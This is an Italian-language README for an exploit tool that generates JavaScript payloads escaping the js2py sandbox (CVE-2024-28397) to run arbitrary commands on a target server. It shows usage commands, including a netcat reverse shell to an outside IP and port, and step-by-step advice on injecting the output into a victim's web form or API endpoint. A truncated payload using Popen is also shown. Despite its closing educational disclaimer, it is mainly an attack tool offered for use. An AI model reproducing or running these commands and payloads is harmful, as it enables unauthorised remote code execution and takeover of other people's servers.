
Exploit professionale per CVE-2024-28397: escape dalla sandbox di Js2Py che porta all'esecuzione remota di codice (RCE). Include generazione modulare di payload.
💡 Approfondimento: Clicca qui per leggere il briefing tecnico completo (PDF).
Un generatore di payload professionale per CVE-2024-28397. Questo strumento genera codice JavaScript malevolo progettato per evadere la sandbox js2py (versioni <= 0.74) ed eseguire comandi arbitrari sul sistema target.
Js2PyObject.getOwnPropertyNames per accedere alla classe subprocess.Popen di Python dall'interno dell'ambiente JavaScript.Questo script genera il payload JavaScript esatto necessario per sfruttare la vulnerabilità. Non è necessario installare js2py per utilizzare questo strumento.
Esegui lo script con il comando che desideri eseguire sulla macchina della vittima.
# Generate payload to run 'id'
python3 exploit.py -c "id"
# Generate payload for a Reverse Shell
python3 exploit.py -c "nc -e /bin/bash 10.10.10.10 4444"
Copia l'output generato dallo strumento e iniettilo nell'applicazione vulnerabile (ad esempio, un modulo web, un endpoint API o un file di configurazione analizzato da js2py).
Esempio di Iniezione:
Se un sito web prende l'input dell'utente e lo esegue con js2py.eval_js(user_input), incollare il codice generato eseguirà il tuo comando sul loro server.
$ python3 exploit.py -c "whoami"
var output = "Initial";
try {
var leaked_wrapper = Object.getOwnPropertyNames({});
// ... (full malicious code) ...
var res = Popen("whoami", ...).communicate();
output = res;
} ...
output
Ali Sünbül (xeloxa)
Questo software è fornito esclusivamente per scopi educativi e di ricerca sulla sicurezza. L'autore non si assume alcuna responsabilità per un uso improprio di questo codice. Assicurati di avere l'autorizzazione esplicita prima di testarlo su qualsiasi sistema di cui non sei proprietario.